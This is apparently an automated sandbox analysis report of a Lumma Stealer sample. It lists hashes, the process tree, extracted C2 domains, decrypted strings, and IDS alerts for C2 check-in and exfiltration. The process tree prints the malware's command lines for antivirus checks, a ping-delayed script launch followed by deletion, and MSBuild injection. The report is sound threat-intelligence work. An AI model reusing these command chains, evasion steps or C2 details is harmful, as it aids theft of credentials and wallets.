Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1546641
MD5:	6fdf2cdf68ab1880aa76e7938e241fa3
SHA1:	affc9a0aea771ad101357cc728951f5938b5e4e6
SHA256:	e61ce90df13402909985f5312fdef798736eb10e0b5b6b280fb826538e7a597a
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

Potential key logger detected (key state polling based)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected Keylogger Generic

Classification

Process Tree

System is w10x64

file.exe (PID: 7388 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6FDF2CDF68AB1880AA76E7938E241FA3)

file.tmp (PID: 7404 cmdline: "C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp" /SL5="$40476,2820349,845824,C:\Users\user\Desktop\file.exe" MD5: 945EC37B9971C5E9F26FAFAD6EDFD46E)

file.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\file.exe" /VERYSILENT MD5: 6FDF2CDF68AB1880AA76E7938E241FA3)

file.tmp (PID: 7456 cmdline: "C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp" /SL5="$2047E,2820349,845824,C:\Users\user\Desktop\file.exe" /VERYSILENT MD5: 945EC37B9971C5E9F26FAFAD6EDFD46E)

cmd.exe (PID: 7520 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7572 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 7580 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 7616 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7672 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 7680 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 7716 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7768 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 7776 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 7812 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7864 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 7872 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 7908 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7956 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 7964 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 8008 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 8060 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 8068 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

Updater.exe (PID: 8104 cmdline: "C:\Users\user\AppData\Local\hangbird\\Updater.exe" "C:\Users\user\AppData\Local\hangbird\\caliculus.csv" MD5: 3F58A517F1F4796225137E7659AD2ADB)

cmd.exe (PID: 7424 cmdline: "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\bYrIyAT.a3x && del C:\ProgramData\\bYrIyAT.a3x MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 7380 cmdline: ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)

Updater.exe (PID: 7592 cmdline: updater.exe C:\ProgramData\\bYrIyAT.a3x MD5: 3F58A517F1F4796225137E7659AD2ADB)

MSBuild.exe (PID: 7552 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["goalyfeastz.site", "dilemmadu.site", "seallysl.site", "authorisev.site", "contemteny.site", "faulteyotk.site", "opposezmny.site", "servicedny.site"], "Build id": "MkfS5f--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: Updater.exe PID: 7592	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: MSBuild.exe PID: 7552	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 104.21.85.194, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7552, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49739

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T10:50:56.091683+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	104.21.85.194	443	TCP
2024-11-01T10:50:56.931094+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	104.21.85.194	443	TCP
2024-11-01T10:50:58.181978+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	104.21.85.194	443	TCP
2024-11-01T10:50:59.505004+0100	2028371	3	Unknown Traffic	192.168.2.4	49749	104.21.85.194	443	TCP
2024-11-01T10:51:00.724341+0100	2028371	3	Unknown Traffic	192.168.2.4	49755	104.21.85.194	443	TCP
2024-11-01T10:51:02.250998+0100	2028371	3	Unknown Traffic	192.168.2.4	49766	104.21.85.194	443	TCP
2024-11-01T10:51:03.970713+0100	2028371	3	Unknown Traffic	192.168.2.4	49777	104.21.85.194	443	TCP
2024-11-01T10:51:07.061291+0100	2028371	3	Unknown Traffic	192.168.2.4	49793	104.21.85.194	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T10:50:56.269364+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49739	104.21.85.194	443	TCP
2024-11-01T10:50:57.391364+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49741	104.21.85.194	443	TCP
2024-11-01T10:51:07.534926+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49793	104.21.85.194	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T10:50:56.269364+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49739	104.21.85.194	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T10:50:57.391364+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49741	104.21.85.194	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T10:50:56.091683+0100	2057072	1	Domain Observed Used for C2 Detected	192.168.2.4	49739	104.21.85.194	443	TCP
2024-11-01T10:50:56.931094+0100	2057072	1	Domain Observed Used for C2 Detected	192.168.2.4	49741	104.21.85.194	443	TCP
2024-11-01T10:50:58.181978+0100	2057072	1	Domain Observed Used for C2 Detected	192.168.2.4	49743	104.21.85.194	443	TCP
2024-11-01T10:50:59.505004+0100	2057072	1	Domain Observed Used for C2 Detected	192.168.2.4	49749	104.21.85.194	443	TCP
2024-11-01T10:51:00.724341+0100	2057072	1	Domain Observed Used for C2 Detected	192.168.2.4	49755	104.21.85.194	443	TCP
2024-11-01T10:51:02.250998+0100	2057072	1	Domain Observed Used for C2 Detected	192.168.2.4	49766	104.21.85.194	443	TCP
2024-11-01T10:51:03.970713+0100	2057072	1	Domain Observed Used for C2 Detected	192.168.2.4	49777	104.21.85.194	443	TCP
2024-11-01T10:51:07.061291+0100	2057072	1	Domain Observed Used for C2 Detected	192.168.2.4	49793	104.21.85.194	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (authorisev .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T10:50:55.462070+0100	2057071	1	Domain Observed Used for C2 Detected	192.168.2.4	51868	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T10:51:02.968026+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49766	104.21.85.194	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T10:51:03.974381+0100	2843864	1	A Network Trojan was detected	192.168.2.4	49777	104.21.85.194	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 36.2.MSBuild.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["goalyfeastz.site", "dilemmadu.site", "seallysl.site", "authorisev.site", "contemteny.site", "faulteyotk.site", "opposezmny.site", "servicedny.site"], "Build id": "MkfS5f--"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 95.8% probability

Sample uses string decryption to hide its real strings

Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: servicedny.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: authorisev.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: faulteyotk.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: dilemmadu.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: contemteny.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: goalyfeastz.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: opposezmny.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: seallysl.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: authorisev.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: MkfS5f--

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 36_2_0041D5AF CryptUnprotectData,

36_2_0041D5AF

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49793 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdb source: file.exe, is-E0D1D.tmp.3.dr
Source:	Binary string: wntdll.pdbUGP source: Updater.exe, 00000023.00000003.2224707416.0000000004201000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2228529906.000000000427C000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2226347479.00000000040E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdbz source: file.exe, is-E0D1D.tmp.3.dr
Source:	Binary string: wntdll.pdb source: Updater.exe, 00000023.00000003.2224707416.0000000004201000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2228529906.000000000427C000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2226347479.00000000040E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\zlib-dll\Release\isunzlib.pdb source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B8E180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	35_2_00B8E180
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B9A187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	35_2_00B9A187
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B9A2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	35_2_00B9A2E4
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B9A66E FindFirstFileW,Sleep,FindNextFileW,FindClose,	35_2_00B9A66E
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B9686D FindFirstFileW,FindNextFileW,FindClose,	35_2_00B9686D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B8E9BA GetFileAttributesW,FindFirstFileW,FindClose,	35_2_00B8E9BA
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B974F0 FindFirstFileW,FindClose,	35_2_00B974F0
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B97591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	35_2_00B97591
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B8DE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	35_2_00B8DE32
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_013F50B5 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	35_2_013F50B5
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_013F51BD FindFirstFileA,GetLastError,	35_2_013F51BD
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_013F29E5 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	35_2_013F29E5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h]	36_2_00410130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [ebx], dl	36_2_00410130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h]	36_2_00410130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edx, ecx	36_2_00410130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edx, ecx	36_2_00410130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [eax]	36_2_004441F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edx, ecx	36_2_0044137E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edx, ecx	36_2_004413D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp eax	36_2_0041D5AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edx, eax	36_2_0043A97E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [eax+ebx*8], 7CDE1E50h	36_2_0043A97E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h	36_2_0043A97E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [ebx], cl	36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, eax	36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then lea edx, dword ptr [eax-80h]	36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+ecx+0000009Ch]	36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+068F7B6Bh]	36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [ebx], al	36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [eax+ebx], 30303030h	36_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [eax+ebx], 20202020h	36_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h	36_2_0043B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h]	36_2_00410118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [ebx], dl	36_2_00410118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h]	36_2_00410118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edx, ecx	36_2_00410118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edx, ecx	36_2_00410118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp edx	36_2_004431D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then xor byte ptr [ecx+ebx], bl	36_2_004431D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-7DC9E524h]	36_2_004241E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp edx	36_2_00442EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then xor byte ptr [ecx+ebx], bl	36_2_00442EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp edx	36_2_004432C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then xor byte ptr [ecx+ebx], bl	36_2_004432C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [eax+ebx], 00000030h	36_2_004012D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, ebx	36_2_00421333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [eax]	36_2_00444380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp edx	36_2_004433B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then xor byte ptr [ecx+ebx], bl	36_2_004433B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	36_2_0042E400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+ecx+0000009Ch]	36_2_0042F4DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+068F7B6Bh]	36_2_0042F4DD
